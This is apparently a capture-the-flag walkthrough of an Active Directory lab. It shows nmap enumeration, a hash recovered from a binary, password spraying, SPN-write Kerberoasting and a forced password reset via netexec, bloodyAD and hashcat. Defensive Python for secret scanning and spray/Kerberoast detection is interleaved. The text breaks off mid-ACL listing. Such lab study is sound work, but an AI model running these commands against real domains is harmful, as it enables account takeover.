404 Bank
Active Directory Machine
Enumeration
The first thing to do is run an Nmap scan to identify the open ports and services.
From the scan results, we can observe that we are dealing with an Active Directory environment, which is essentially the core idea of this challenge.
> sudo nmap -p- -T4 10.1.60.192 -sCV
Nmap scan report for 10.1.60.192
Host is up (0.16s latency).
Not shown: 65511 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 404 Finance Group
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-06-22 17:44:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: 404finance.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-404.404finance.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-404.404finance.local
| Not valid before: 2026-06-22T17:22:16
|_Not valid after: 2027-06-22T17:22:16
|_ssl-date: 2026-06-22T17:45:38+00:00; 0s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: 404finance.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-06-22T17:45:38+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC-404.404finance.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-404.404finance.local
| Not valid before: 2026-06-22T17:22:16
|_Not valid after: 2027-06-22T17:22:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: 404finance.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-06-22T17:45:38+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC-404.404finance.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-404.404finance.local
| Not valid before: 2026-06-22T17:22:16
|_Not valid after: 2027-06-22T17:22:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: 404finance.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-06-22T17:45:38+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC-404.404finance.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-404.404finance.local
| Not valid before: 2026-06-22T17:22:16
|_Not valid after: 2027-06-22T17:22:16
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC-404.404finance.local
| Not valid before: 2026-01-27T22:25:59
|_Not valid after: 2026-07-29T22:25:59
|_ssl-date: 2026-06-22T17:45:38+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: FINANCE404
| NetBIOS_Domain_Name: FINANCE404
| NetBIOS_Computer_Name: DC-404
| DNS_Domain_Name: 404finance.local
| DNS_Computer_Name: DC-404.404finance.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-06-22T17:44:58+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49727/tcp open msrpc Microsoft Windows RPC
49828/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC-404; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-06-22T17:45:00
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 636.37 seconds
The challenge does not provide us with a foothold, so gaining one is our first objective.
The Nmap scan reveals an HTTP service on port 80, which warrants further enumeration.
Navigating to port 80, we are presented with the homepage of 404 Finance Group, a fictional banking website.

However, the most notable finding is located within the Services section, which hosts a downloadable binary named CorpBankDialer.exe.
Gaining Foothold
After downloading the binary, we can perform a quick analysis using the strings tool.
Examining the output, we can identify a base64-encoded string.
> strings CorpBankDialer.exe
/lib64/ld-linux-x86-64.so.2
__libc_start_main
__cxa_finalize
printf
libc.so.6
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
Welcome to CorpBank SecureAccess v3.7.2\n
DEBUG: ZGQy***************************************=\n
;*3$"
GCC: (Debian 14.2.0-19) 14.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
CorpBankDialer.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
_edata
_fini
printf@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.note.gnu.property
.note.gnu.build-id
.interp
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.note.ABI-tag
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
Decoding the base64 string yields an MD5 hash.
> echo 'ZGQyZWYzNDUzMGRlN2U1YmVmMjJhMDVlN2U1ZGQxNzg=' | base64 -d
dd2ef34530de7e5bef22a05e7e5dd178%
The MD5 hash can then be cracked with tools such as hashcat or John the Ripper, or online using CrackStation.
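The DEBUG string is the classic "secret shipped inside a binary" finding: a base64 wrapper around a hex digest. As an added example (not part of the original writeup), here is a small Python secret scanner of the kind a build pipeline or pre-release review would run over `strings` output: it finds base64 tokens, decodes them, and reports any that hide an MD5/SHA-1/SHA-256/SHA-512 hex digest, discarding symbol-name noise and base64 that decodes to ordinary text. The sample lines and the digest inside them are constructed, not the binary's real content.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Base64 runs of at least 16 characters with optional padding; shorter runs are mostly symbol-name noise.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Lower-case hex of these lengths is almost always a stored digest.
DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}
HEX = re.compile(r"^[0-9a-f]+$")


@dataclass
class Finding:
    line_no: int
    token: str
    decoded: str
    kind: str


def decode_token(token):
    """Decode one base64 token (missing padding tolerated); None unless valid base64 and printable ASCII."""
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def classify(decoded):
    """Name the digest type if the decoded text looks like one, else None."""
    if HEX.match(decoded) and len(decoded) in DIGEST_LENGTHS:
        return DIGEST_LENGTHS[len(decoded)]
    return None


def scan_strings_output(lines):
    """Walk the lines of `strings <binary>` and return every base64 token that hides a hex digest."""
    findings = []
    for n, line in enumerate(lines, 1):
        for m in B64_TOKEN.finditer(line):
            decoded = decode_token(m.group(0))
            if decoded and classify(decoded):
                findings.append(Finding(n, m.group(0), decoded, classify(decoded)))
    return findings


# Constructed sample in the shape of the strings output above; the digest is an invented placeholder.
DIGEST = "0123456789abcdef0123456789abcdef"  # placeholder, not a real credential hash
SAMPLE_STRINGS = [
    "/lib64/ld-linux-x86-64.so.2",
    "__libc_start_main",
    "_ITM_deregisterTMCloneTable",        # long alphabet run, but decodes to garbage: filtered out
    "Welcome to CorpBank SecureAccess v3.7.2\\n",
    "DEBUG: " + base64.b64encode(DIGEST.encode()).decode() + "\\n",
    base64.b64encode(b"just a text blob, not a digest").decode(),  # valid base64, but not a hash
    "GCC: (Debian 14.2.0-19) 14.2.0",
]

if __name__ == "__main__":
    for f in scan_strings_output(SAMPLE_STRINGS):
        print(f"line {f.line_no}: {f.kind} digest {f.decoded} (from {f.token})")
```

The same check generalises to any build artefact: pipe `strings` of each release binary through `scan_strings_output` and fail the pipeline on a hit, which catches a debug credential before it reaches a public download page.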
Now we have the password, but we still need to find the username!
The password likely belongs to one of the IT staff members, since it was found embedded within a binary file.
The home page of the website lists three team members, one of whom is an IT staff member and is likely associated with this password.
Since we don’t know the username format used in this domain, we can use the username-anarchy tool to generate a wordlist containing all possible username combinations.
> ./username-anarchy Karl Hackermann > usernames
> cat usernames
karl
karlhackermann
karl.hackermann
karlhack
karlh
k.hackermann
khackermann
hkarl
h.karl
hackermannk
hackermann
hackermann.k
hackermann.karl
kh
Now we have a password and a username wordlist, so let’s attempt a password spraying attack.
We’re on the right track: we successfully obtained a foothold.
> nxc smb 10.1.60.192 -u usernames -p 'P************'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [-] 404finance.local\karl:P************ STATUS_LOGON_FAILURE
SMB 10.1.60.192 445 DC-404 [-] 404finance.local\karlhackermann:P************ STATUS_LOGON_FAILURE
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\karl.hackermann:P************
Now, let’s enumerate further into this domain.
Jumping to tom.reboot
First, generate a hosts file for the target domain.
> nxc smb 10.1.60.192 -u karl.hackermann -p 'P************' --generate-hosts-file host
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\karl.hackermann:P************
> cat host
10.1.60.192 DC-404.404finance.local 404finance.local DC-404
Next, I performed a quick scan for dangerous ACL misconfigurations that our foothold user has over the domain objects.
Find my tool here: aclhug
I found that our foothold user has WriteAllProperties permission over the user tom.reboot, which can be leveraged to set an SPN on that account and perform a targeted Kerberoasting attack.
> python3 aclhug.py --dc-ip 10.1.60.192 -d 404finance.local -u karl.hackermann -p 'P************'
AD ACL Hunter
Time : 2026-06-22 15:03:06 EDT
User : karl.hackermann
Domain : 404finance.local
DC IP : 10.1.60.192
Base DN : DC=404FINANCE,DC=LOCAL
[*] Connecting...
[+] Connection established
[*] Resolving 'karl.hackermann'...
[+] SID : S-1-5-21-2956725473-317782918-2795636496-1103
[+] DN : CN=Karl Hackermann,CN=Users,DC=404finance,DC=local
[+] Type : User
[*] Paged ACL scan (page_size=500)...
[*] Scanning 255 objects for SID S-1-5-21-2956725473-317782918-2795636496-1103...
[████████████████████] 100% (255/255)
════════════════════════════════════════════════════════════════════════════════
🎯 ACL Results › karl.hackermann [user]
Summary: 🟠 HIGH: 1
🟠 HIGH WriteAllProperties
Target : tom.reboot [top | person | organizationalperson | user]
DN : CN=Tom Reboot,CN=Users,DC=404finance,DC=local
Rights : ReadControl, WriteAllProperties[no-GUID], ReadProperty, ListChildren
Technique : Write any attribute (WriteProperty with no GUID restriction)
Methods : shadow-credentials, set-spn, set-rbcd, set-scriptpath, set-primary-group, write-alt-sec-ids
Attack : Same as GenericWrite — write any attribute without restriction.
ACE Type : ACCESS_ALLOWED_ACE
We can use the bloodyAD tool to set an SPN on the target user.
> bloodyAD --host 10.1.60.192 -d 404finance.local -u karl.hackermann -p 'P************' set object tom.reboot ServicePrincipalName -v 'sys/service' --raw
[+] tom.reboot's ServicePrincipalName has been updated
We can then use the netexec tool to perform the Kerberoasting attack.
> nxc ldap 10.1.60.192 -u karl.hackermann -p 'P************' --kerberoasting output.txt
LDAP 10.1.60.192 389 DC-404 [*] Windows 10 / Server 2019 Build 17763 (name:DC-404) (domain:404finance.local) (signing:None) (channel binding:Never)
LDAP 10.1.60.192 389 DC-404 [+] 404finance.local\karl.hackermann:P************
LDAP 10.1.60.192 389 DC-404 [*] Skipping disabled account: krbtgt
LDAP 10.1.60.192 389 DC-404 [*] Total of records returned 1
LDAP 10.1.60.192 389 DC-404 [*] sAMAccountName: tom.reboot, memberOf: [], pwdLastSet: 2025-07-02 14:07:16.814798, lastLogon: 2025-07-01 15:37:45.167151
LDAP 10.1.60.192 389 DC-404 $krb5tgs$23$*tom.reboot$404FINANCE.LOCAL$404finance.local\tom.reboot*$0640e7548589f7c88bc707d1.....
We can now crack the tom.reboot hash using hashcat with mode 13100.
> hashcat -m 13100 output.txt /usr/share/wordlists/rockyou.txt
Now we have access as tom.reboot.
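From the defender's side, both the password spray against the username wordlist and the SPN-write-then-Kerberoast sequence leave a distinctive trail in the domain controller's Security log: 4625 failures for many accounts from one source, a 5136 directory change that writes servicePrincipalName on a user object, and a 4769 TGS request with RC4 (etype 0x17, the $krb5tgs$23$ format) for a user account rather than a computer. The Python below is an added example, not part of the writeup or of netexec/bloodyAD; it runs those two rules over constructed, simplified event records (field names reduced, the source address 10.1.60.50 invented) and correlates the SPN write with the RC4 ticket request that follows it.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Thresholds are illustrative defaults; tune them to the environment's baseline.
SPRAY_MIN_USERS = 3                  # distinct accounts failing from one source
SPRAY_WINDOW = timedelta(minutes=5)
KERBEROAST_WINDOW = timedelta(hours=1)
RC4_HMAC = "0x17"                    # etype 23, i.e. the $krb5tgs$23$ hash format


def detect_password_spray(events):
    """Flag a source that produces 4625 logon failures for many distinct accounts in a short window."""
    by_source = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            by_source[e["IpAddress"]].append(e)
    alerts = []
    for ip, fails in by_source.items():
        fails.sort(key=lambda e: e["time"])
        for i, first in enumerate(fails):
            window = [f for f in fails[i:] if f["time"] - first["time"] <= SPRAY_WINDOW]
            users = {f["TargetUserName"].lower() for f in window}
            if len(users) >= SPRAY_MIN_USERS:
                alerts.append({"rule": "password_spray", "source": ip, "users": sorted(users)})
                break  # one alert per source is enough
    return alerts


def detect_targeted_kerberoast(events):
    """Flag RC4 TGS requests (4769) for user accounts; escalate when a 5136 shows the SPN was just written."""
    spn_writes = {}
    for e in events:
        if e["id"] == 5136 and e["AttributeLDAPDisplayName"] == "servicePrincipalName":
            spn_writes[e["TargetAccount"].lower()] = e
    alerts = []
    for e in events:
        if e["id"] != 4769 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = e["ServiceName"].lower()
        if svc.endswith("$") or svc == "krbtgt":
            continue  # usual noise filters: computer accounts and the KDC service itself
        alert = {"rule": "rc4_tgs_for_user_spn", "service": svc, "requester": e["TargetUserName"]}
        write = spn_writes.get(svc)
        if write and timedelta(0) <= e["time"] - write["time"] <= KERBEROAST_WINDOW:
            alert["rule"] = "targeted_kerberoast"
            alert["spn_written_by"] = write["SubjectUserName"]
            alert["spn_value"] = write["AttributeValue"]
        alerts.append(alert)
    return alerts


def run_all(events):
    return detect_password_spray(events) + detect_targeted_kerberoast(events)


# Constructed sample events with simplified field names (real 4625/4769/5136 records carry more fields).
T0 = datetime(2026, 6, 22, 17, 50, 0)


def ev(seconds, event_id, **fields):
    return {"time": T0 + timedelta(seconds=seconds), "id": event_id, **fields}


SAMPLE_EVENTS = [
    ev(0, 4625, IpAddress="10.1.60.50", TargetUserName="karl", Status="0xC000006D"),
    ev(1, 4625, IpAddress="10.1.60.50", TargetUserName="karlhackermann", Status="0xC000006D"),
    ev(2, 4625, IpAddress="10.1.60.50", TargetUserName="karlhack", Status="0xC000006D"),
    ev(3, 4624, IpAddress="10.1.60.50", TargetUserName="karl.hackermann"),
    ev(600, 5136, SubjectUserName="karl.hackermann", TargetAccount="tom.reboot",
       AttributeLDAPDisplayName="servicePrincipalName", AttributeValue="sys/service"),
    ev(660, 4769, TargetUserName="karl.hackermann@404FINANCE.LOCAL", ServiceName="tom.reboot",
       TicketEncryptionType="0x17"),
    ev(700, 4769, TargetUserName="karl.hackermann@404FINANCE.LOCAL", ServiceName="DC-404$",
       TicketEncryptionType="0x12"),   # AES ticket for a computer account: benign
    ev(18000, 4625, IpAddress="10.1.60.51", TargetUserName="nina.inkasso", Status="0xC000006A"),
]

if __name__ == "__main__":
    for a in run_all(SAMPLE_EVENTS):
        print(a)
```

A 5136 record is only written when the Audit Directory Service Changes subcategory is enabled and the user object carries a SACL for write-property; without that, the RC4 rule still fires on the 4769 alone, just without the attribution to whoever added the SPN.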
Jump to robert.graef
I again ran a quick scan for dangerous ACL misconfigurations, this time for the rights tom.reboot has over the domain objects.
I found that tom.reboot has ForceChangePassword permission over the user robert.graef.
> python3 aclhug.py --dc-ip 10.1.60.192 -d 404finance.local -u karl.hackermann -p 'P************' -t tom.reboot
AD ACL Hunter
Time : 2026-06-22 15:38:34 EDT
User : karl.hackermann
Domain : 404finance.local
DC IP : 10.1.60.192
Base DN : DC=404FINANCE,DC=LOCAL
[*] Connecting...
[+] Connection established
[*] Resolving 'tom.reboot'...
[+] SID : S-1-5-21-2956725473-317782918-2795636496-1104
[+] DN : CN=Tom Reboot,CN=Users,DC=404finance,DC=local
[+] Type : User
[*] Paged ACL scan (page_size=500)...
[*] Scanning 255 objects for SID S-1-5-21-2956725473-317782918-2795636496-1104...
[████████████████████] 100% (255/255)
════════════════════════════════════════════════════════════════════════════════
🎯 ACL Results › tom.reboot [user]
Summary: 🟠 HIGH: 1
🟠 HIGH ForceChangePassword
Target : robert.graef [top | person | organizationalperson | user]
DN : CN=Robert Graef,CN=Users,DC=404finance,DC=local
Rights : ForceChangePassword
Technique : Password Reset (no current password required)
Methods : force-change-password
Attack : Reset the target's password to anything — immediate account
takeover.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 00299570-246d-11d0-a768-00aa006e0529
════════════════════════════════════════════════════════════════════════════════
We can use the bloodyAD tool again to force a change of robert.graef's password.
> bloodyAD --host 10.1.60.192 -d 404finance.local -u tom.reboot -p 'P**********' set password robert.graef 'Password@123'
[+] Password changed successfully!
Make sure the password has really changed!
> nxc smb 10.1.60.192 -u robert.graef -p 'Password@123'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\robert.graef:Password@123
Jump to daniel.hoffmann
Another quick scan for dangerous ACL misconfigurations, this time for the rights robert.graef has over the domain objects.
> python3 aclhug.py --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123'
AD ACL Hunter
Time : 2026-06-22 16:19:50 EDT
User : robert.graef
Domain : 404finance.local
DC IP : 10.1.60.192
Base DN : DC=404FINANCE,DC=LOCAL
[*] Connecting...
[+] Connection established
[*] Resolving 'robert.graef'...
[+] SID : S-1-5-21-2956725473-317782918-2795636496-1105
[+] DN : CN=Robert Graef,CN=Users,DC=404finance,DC=local
[+] Type : User
[*] Paged ACL scan (page_size=500)...
[*] Scanning 255 objects for SID S-1-5-21-2956725473-317782918-2795636496-1105...
[████████████████████] 100% (255/255)
════════════════════════════════════════════════════════════════════════════════
🎯 ACL Results › robert.graef [user]
Summary: 🟠 HIGH: 29
🟠 HIGH WriteUserAccountControl
Target : svc.services [top | person | organizationalperson | user]
DN : CN=Service Account,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Web Admins [top | group]
DN : CN=Web Admins,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : webadmin [top | person | organizationalperson | user]
DN : CN=Alex Meier,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : daniel.hoffmann [top | person | organizationalperson | user]
DN : CN=Daniel Hoffmann,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH ForceChangePassword
Target : melanie.kunz [top | person | organizationalperson | user]
DN : CN=Melanie Kunz,CN=Users,DC=404finance,DC=local
Rights : ForceChangePassword
Technique : Password Reset (no current password required)
Methods : force-change-password
Attack : Reset the target's password to anything — immediate account
takeover.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 00299570-246d-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : melanie.kunz [top | person | organizationalperson | user]
DN : CN=Melanie Kunz,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH ForceChangePassword
Target : jan.tresor [top | person | organizationalperson | user]
DN : CN=Jan Tresor,CN=Users,DC=404finance,DC=local
Rights : ForceChangePassword
Technique : Password Reset (no current password required)
Methods : force-change-password
Attack : Reset the target's password to anything — immediate account
takeover.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 00299570-246d-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : jan.tresor [top | person | organizationalperson | user]
DN : CN=Jan Tresor,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH ForceChangePassword
Target : nina.inkasso [top | person | organizationalperson | user]
DN : CN=Nina Inkasso,CN=Users,DC=404finance,DC=local
Rights : ForceChangePassword
Technique : Password Reset (no current password required)
Methods : force-change-password
Attack : Reset the target's password to anything — immediate account
takeover.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 00299570-246d-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : nina.inkasso [top | person | organizationalperson | user]
DN : CN=Nina Inkasso,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : robert.graef [top | person | organizationalperson | user]
DN : CN=Robert Graef,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : tom.reboot [top | person | organizationalperson | user]
DN : CN=Tom Reboot,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : karl.hackermann [top | person | organizationalperson | user]
DN : CN=Karl Hackermann,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : DnsUpdateProxy [top | group]
DN : CN=DnsUpdateProxy,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : DnsAdmins [top | group]
DN : CN=DnsAdmins,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Protected Users [top | group]
DN : CN=Protected Users,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Cloneable Domain Controllers [top | group]
DN : CN=Cloneable Domain Controllers,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
